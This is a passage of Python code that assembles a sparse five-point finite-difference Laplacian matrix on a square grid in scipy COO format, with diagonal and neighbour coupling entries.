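    index = lambda i, j: i * size + j
    rows, cols, vals = [], [], []
    for i in range(size):
        for j in range(size):
            # Diagonal entry for grid point (i, j).
            rows.append(index(i, j))
            cols.append(index(i, j))
            vals.append(-4.0 / h2)
            # Off-diagonal couplings to the four in-bounds neighbors.
            for di, dj in ((-1, 0), (1, 0), (0, -1), (0, 1)):
                ni, nj = i + di, j + dj
                if 0 <= ni < size and 0 <= nj < size:  # assumed bounds check
                    rows.append(index(i, j))
                    cols.append(index(ni, nj))
                    vals.append(1.0 / h2)
    n = size * size
    return coo_matrix((vals, (rows, cols)), shape=(n, n))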